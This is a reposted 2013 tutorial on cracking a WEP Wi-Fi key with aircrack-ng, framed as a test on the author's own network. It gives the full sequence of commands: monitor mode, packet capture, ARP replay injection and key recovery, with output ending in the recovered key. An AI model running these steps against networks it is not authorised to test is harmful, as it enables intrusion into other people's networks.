WEP wifi password.. Cracking WEP stands for Wireless Equivalent Privacy To crack the WEP key a hacker needs to capture sample packets not intended for his own network interface and run crack program to compare testing keys against WEP key bundled with captured packets in attempt of decryption. The key which fits to decrypt captured packets is the key used by wireless network to encrypt its entire wireless communication with its connected stations. Turn on Monitor mode # airmon-ng start wlan0 Interface Chipset Driver wlan0 rtl8180 - [phy0] (monitor mode enabled on mon0) Identify a wireless network BSSID # airodump-ng wlan0 Information we can retrieve from airodump-ng output: BASE: BSSID : 00:11:95:9F:FD:F4 Channel: 6 STATION: MAC: 00:13:02:30:FF:EC Station connected to my wireless router is our laptop with wireless network card running Debian lenny. It is important to have at least one station associated with base so we can capture packets from this communication. Sniffing wireless network At this stage we can start capturing packets between base and station. The following command will start capturing packets. It is recommended to capture at least 5000 packets. Number of packets required depends on WEP key length in use. I have managed to crack WEP key 64 bits long with 10 hex characters with around 6000 captured packets. Number 6 in the following command is a channel number of our wireless base station. # airodump-ng -c 6 -w data-capture wlan0 Capturing the packets may take some. aireplay-ng will create some traffic so we can capture more packets for a given time. Since we are hacking our own network, browsing internet on my laptop also helps to create some traffic. # aireplay-ng -3 -b 00:11:95:9F:FD:F4 -h 00:13:02:30:FF:EC wlan0 Crack WEP wireless key As a last step we crack WEP key by using captured packets and aircrack-ng command. All captured packets are now stored in data-capture-01.cap file. NOTE: do not stop capturing process as you do not know if current amount of captured packed is satisfactory to crack WEP key. # aircrack-ng -z data-capture-01.cap Opening data-capture-01.cap Read 450 packets. # BSSID ESSID Encryption 1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs) 2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0) Index number of target network ? 1 Aircrack-ng 1.0 rc1 [00:00:13] Tested 485 keys (got 16690 IVs) KB depth byte(vote) 0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736) 1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248) 2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504) 3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016) 4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992) KEY FOUND! [ 3F:F3:8E:6E:98 ] Decrypted correctly: 100%
Posted on: Sat, 27 Jul 2013 18:13:40 +0000
Trending Topics
Recently Viewed Topics
© 2015